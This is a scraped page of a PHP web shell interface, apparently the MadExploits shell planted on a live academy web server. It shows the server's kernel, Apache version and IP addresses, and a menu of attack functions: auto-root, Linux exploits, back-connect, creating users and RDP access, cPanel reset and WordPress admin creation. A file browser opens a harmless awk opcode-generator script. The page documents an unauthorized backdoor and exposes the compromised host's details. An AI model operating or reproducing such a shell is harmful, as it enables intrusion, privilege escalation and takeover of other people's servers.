Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
devel /
[ HOME SHELL ]
Name
Size
Permission
Action
graph
[ DIR ]
drwxrwxr-x
gen_const_string_opcodes.awk
1.34
KB
-rwxrwxr-x
gen_xc_opcode_spec.awk
745
B
-rwxrwxr-x
lsnewini
244
B
-rwxrwxr-x
make
33
B
-rwxrwxr-x
po2php.awk
895
B
-rwxrwxr-x
prepare.cfg.example
217
B
-rw-rw-r--
prepare.mak
4.77
KB
-rw-rw-r--
run
7.93
KB
-rwxrwxr-x
sample.cpp.php
11.66
KB
-rw-rw-r--
test.mak
496
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gen_const_string_opcodes.awk
#! /usr/bin/awk -f # vim:ts=4:sw=4 # process zend_vm_def.h or zend_compile.h BEGIN { FS=" " max = 0; } /^ZEND_VM_HANDLER\(/ { # regex from php5.1+/Zend/zend_vm_gen.php gsub(/ +/, ""); if (!match($0, /^ZEND_VM_HANDLER\(([0-9]+),([A-Z_]+),([A-Z|]+),([A-Z|]+)\)/)) { print "error unmatch $0"; exit; } # life is hard without 3rd argument of match() sub(/^ZEND_VM_HANDLER\(/, ""); id = $0; sub(/,.*/, "", id); # chop id = 0 + id; sub(/^([0-9]+),/, ""); sub(/,.*/, ""); # chop name = $0; if (max < id) { max = id; } opcodes[id] = name; next; } /^#define +ZEND_[A-Z_]+[\t ]+[[:digit:]]+$/ { id = 0 + $3; name = $2; if (max < id) { max = id; } opcodes[id] = name; next; } /end of block/ { exit; } END { mymax = 112; if (max < mymax) { for (i = max + 1; i <= mymax; i ++) { opcodes[i] = "UNDEF"; } max = mymax; opcodes[110] = "ZEND_DO_FCALL_BY_FUNC"; opcodes[111] = "ZEND_INIT_FCALL_BY_FUNC"; opcodes[112] = "UNDEF"; } printf "/* size = %d */\n", max + 1; print "static const char *const xc_opcode_names[] = {"; for (i = 0; i <= max; i ++) { if (i != 0) { print ","; } printf "/* %d */\t", i if (i in opcodes) { name = opcodes[i]; sub(/^ZEND_/, "", name); printf "\"%s\"", name; } else if (i == 137) { printf "\"%s\"", "OP_DATA"; } else { printf "\"UNDEF\""; } } print ""; print "};"; }
Close